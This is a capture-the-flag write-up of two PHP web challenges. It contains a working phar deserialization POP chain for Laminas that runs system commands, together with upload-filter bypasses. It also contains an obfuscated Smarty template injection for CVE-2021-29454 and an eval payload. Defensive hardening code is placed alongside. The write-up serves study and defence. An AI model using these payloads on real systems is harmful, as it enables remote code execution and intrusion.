It's been a while since I last played a CTF, so this is to get back in practice.

Web

Fan website

Zend FrameWork Pop Chain

Zend FrameWork Pop Chain - 先知社区 (aliyun.com)

Source code was provided, and it turned out to be the chain from the article above. It can be triggered through phar; the upload has a size restriction and a file-header check, both of which can be bypassed by padding with junk data and gzip-compressing the archive.

```php
<?php
// Generate with phar.readonly disabled, e.g.: php -d phar.readonly=0 gen.php
// Property names and values mirror the Laminas classes so that the
// deserialized object graph walks the chain Logger -> Mail -> PhpRenderer -> TemplateMapResolver.

namespace Laminas\View\Resolver {
    class TemplateMapResolver {
        // The helper name "setBody" is resolved to the callable "system"
        protected $map = ["setBody" => "system"];
    }
}

namespace Laminas\View\Renderer {
    class PhpRenderer {
        private $__helpers;
        function __construct() {
            $this->__helpers = new \Laminas\View\Resolver\TemplateMapResolver();
        }
    }
}

namespace Laminas\Log\Writer {
    abstract class AbstractWriter {}

    class Mail extends AbstractWriter {
        // Becomes the argument passed to the resolved callable
        protected $eventsToMail = ["cat /flag"];
        protected $subjectPrependText = null;
        protected $mail;
        function __construct() {
            $this->mail = new \Laminas\View\Renderer\PhpRenderer();
        }
    }
}

namespace Laminas\Log {
    class Logger {
        protected $writers;
        function __construct() {
            // The second element is a placeholder: the 3 KB of padding needed
            // to satisfy the size check can be written into this string
            $this->writers = [new \Laminas\Log\Writer\Mail(), "3kb的垃圾数据可以写在这"];
        }
    }
}

namespace {
    $poc = new \Laminas\Log\Logger();
    $phar = new \Phar('phar.phar');
    $phar->startBuffering();
    $phar->setStub('GIF89a' . '<?php __HALT_COMPILER();?>'); // set the stub, prepending a GIF file header
    $phar->addFromString('test.txt', 'test');                 // add a file to the archive
    $phar->setMetadata($poc);                                 // store the custom metadata in the manifest
    $phar->stopBuffering();
}
?>
```

gzip-compress the result to strip the recognisable phar header.

Upload it directly, grab the returned path, and then trigger it in the delete-album feature with:

phar:///var/www/html/img/xxxx.jpg
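For the defensive side, here is an added example of how an upload handler and the file-deleting code path could close exactly this bypass. It is not the challenge's code or the write-up's; the function names, the base directory argument and the sample bytes are constructed for illustration, and it assumes PHP 8 with the zlib and GD extensions.

```php
<?php
// Added defensive example (not the challenge source): catch phar archives
// hidden behind an image header and gzip, and keep phar:// away from unlink().

/**
 * True if $bytes look like a phar archive, even when gzip-compressed and
 * prefixed with an image header. Every phar stub must contain the
 * __HALT_COMPILER token, and a gzip wrapper hides it from a naive header check.
 */
function looks_like_phar(string $bytes): bool
{
    // Transparently unwrap gzip (magic bytes 1f 8b) so the compressed form is caught too
    if (strlen($bytes) >= 2 && substr($bytes, 0, 2) === "\x1f\x8b") {
        $decoded = @gzdecode($bytes);
        if ($decoded !== false) {
            $bytes = $decoded;
        }
    }
    return stripos($bytes, '__HALT_COMPILER') !== false;
}

/**
 * Defensive image upload check: a GIF89a prefix alone proves nothing, so the
 * bytes must pass the phar check and GD must actually be able to parse them.
 */
function accept_image_upload(string $bytes): bool
{
    if (looks_like_phar($bytes)) {
        return false;
    }
    if (!extension_loaded('gd')) {
        // Without GD, fall back to whole-signature magic-byte checks
        return str_starts_with($bytes, 'GIF89a')
            || str_starts_with($bytes, "\xFF\xD8\xFF")
            || str_starts_with($bytes, "\x89PNG");
    }
    return @imagecreatefromstring($bytes) !== false;
}

/**
 * The delete-album handler is where phar:// got triggered. Refuse any stream
 * wrapper scheme in a user-supplied path, disable the phar wrapper before
 * touching the filesystem, and confine the resolved path to $baseDir.
 */
function safe_unlink(string $userPath, string $baseDir): bool
{
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $userPath)) {
        return false; // phar://, file://, data:// and friends are all rejected
    }
    if (in_array('phar', stream_get_wrappers(), true)) {
        stream_wrapper_unregister('phar');
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . '/' . basename($userPath));
    if ($base === false || $real === false || strncmp($real, $base, strlen($base)) !== 0) {
        return false;
    }
    return unlink($real);
}

// Constructed sample input: a GIF header glued to a phar-style stub plus padding,
// and the same bytes gzip-compressed, mirroring the bypass described above.
$fakePhar = 'GIF89a' . '<?php __HALT_COMPILER(); ?>' . str_repeat('A', 3072);
$gzipped  = gzencode($fakePhar);

var_dump(looks_like_phar($fakePhar));
var_dump(looks_like_phar($gzipped));
var_dump(accept_image_upload($gzipped));
var_dump(safe_unlink('phar:///var/www/html/img/x.jpg', __DIR__));
```

The important design choice is that the scheme check and `stream_wrapper_unregister('phar')` happen at the sink, not only at upload time: any filesystem function given a user-controlled path (`unlink`, `file_exists`, `is_file`, and so on) can otherwise reach the metadata deserialization regardless of what the upload filter saw.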

Smarty_calculator

Smarty template injection, CVE-2021-29454.

Remote Code Execution (RCE) in smarty/smarty | CVE-2021-29454 | Snyk

Damn, it really is a CVE.

The math expression has a spot that can be bypassed:

```smarty
{math equation="(('1chr'[1].'1chr'[2].'1chr'[3])(115).('1chr'[1].'1chr'[2].'1chr'[3])(121).('1chr'[1].'1chr'[2].'1chr'[3])(115).('1chr'[1].'1chr'[2].'1chr'[3])(116).('1chr'[1].'1chr'[2].'1chr'[3])(101).('1chr'[1].'1chr'[2].'1chr'[3])(109))(('1chr'[1].'1chr'[2].'1chr'[3])(119).('1chr'[1].'1chr'[2].'1chr'[3])(104).('1chr'[1].'1chr'[2].'1chr'[3])(111).('1chr'[1].'1chr'[2].'1chr'[3])(97).('1chr'[1].'1chr'[2].'1chr'[3])(109).('1chr'[1].'1chr'[2].'1chr'[3])(105))" chr=1}
// system('whoami')
```

I didn't look at it any further afterwards because the environment was gone. It worked locally; the online environment had disable_functions, so it should only have needed a bypass for that.

Official payload:

```
data=%7Bfunction%20name%3D'exp()%7B%7D%3Beval(%24_GET%5B1%5D)%3Bfunction%0A%0A'%7D%7B%2Ffunction%7D
```
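Both payloads above work because user input is compiled as template source. As an added example that is not part of the challenge or the write-up, the following shows the vulnerable pattern next to a hardened one for a calculator-style app: user input is assigned as data and escaped on output, and the arithmetic is handled by a small recursive-descent evaluator instead of a template directive or `eval()`. The function and class names are constructed for illustration; it assumes Smarty 3.x/4.x installed through Composer.

```php
<?php
// Added example (not the challenge's code): Smarty SSTI, vulnerable vs. hardened.
require __DIR__ . '/vendor/autoload.php';

// VULNERABLE: the user's text becomes template source, so tags such as
// {math equation=...} or {function name=...} inside the input are compiled as code.
function render_vulnerable(Smarty $smarty, string $userExpr): string
{
    return $smarty->fetch('string:Result: ' . $userExpr);
}

// HARDENED: the template text is fixed; user input is only ever assigned as a
// variable and escaped on output, so it can never introduce template directives.
function render_hardened(Smarty $smarty, string $userExpr): string
{
    $smarty->assign('expr', $userExpr);
    $smarty->assign('value', SafeCalc::evaluate($userExpr));
    return $smarty->fetch('string:Result: {$expr|escape:"html"} = {$value|escape:"html"}');
}

/** Evaluates + - * / and parentheses without eval() or a template engine. */
final class SafeCalc
{
    private array $tokens = [];
    private int $pos = 0;

    public static function evaluate(string $expr): float
    {
        // Whitelist the character set first; anything else is rejected outright
        if (!preg_match('/^[\d\s+\-*\/().]+$/', $expr)) {
            throw new InvalidArgumentException('invalid characters in expression');
        }
        $c = new self();
        preg_match_all('/\d+(?:\.\d+)?|[()+\-*\/]/', $expr, $m);
        $c->tokens = $m[0];
        $v = $c->expr();
        if ($c->pos !== count($c->tokens)) {
            throw new InvalidArgumentException('unexpected trailing token');
        }
        return $v;
    }

    private function expr(): float
    {
        $v = $this->term();
        while (in_array($this->peek(), ['+', '-'], true)) {
            $op = $this->tokens[$this->pos++];
            $r = $this->term();
            $v = $op === '+' ? $v + $r : $v - $r;
        }
        return $v;
    }

    private function term(): float
    {
        $v = $this->factor();
        while (in_array($this->peek(), ['*', '/'], true)) {
            $op = $this->tokens[$this->pos++];
            $r = $this->factor();
            if ($op === '/' && $r == 0.0) {
                throw new DivisionByZeroError('division by zero');
            }
            $v = $op === '*' ? $v * $r : $v / $r;
        }
        return $v;
    }

    private function factor(): float
    {
        $t = $this->peek();
        if ($t === '(') {
            $this->pos++;
            $v = $this->expr();
            if ($this->peek() !== ')') {
                throw new InvalidArgumentException('missing closing parenthesis');
            }
            $this->pos++;
            return $v;
        }
        if ($t === '-') {            // unary minus
            $this->pos++;
            return -$this->factor();
        }
        if ($t === null || !is_numeric($t)) {
            throw new InvalidArgumentException('expected a number');
        }
        $this->pos++;
        return (float) $t;
    }

    private function peek(): ?string
    {
        return $this->tokens[$this->pos] ?? null;
    }
}

// Constructed inputs: a benign expression and the {math ...} style injection above
$smarty = new Smarty();
echo render_hardened($smarty, '(1 + 2) * 3'), PHP_EOL;
try {
    render_hardened($smarty, '{math equation="1+1"}');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

Upgrading Smarty to a version that fixes CVE-2021-29454 is still required, but the structural fix is the one shown: user data never becomes template source, so neither the `{math}` bypass nor the `{function name=...}` payload has anything to compile.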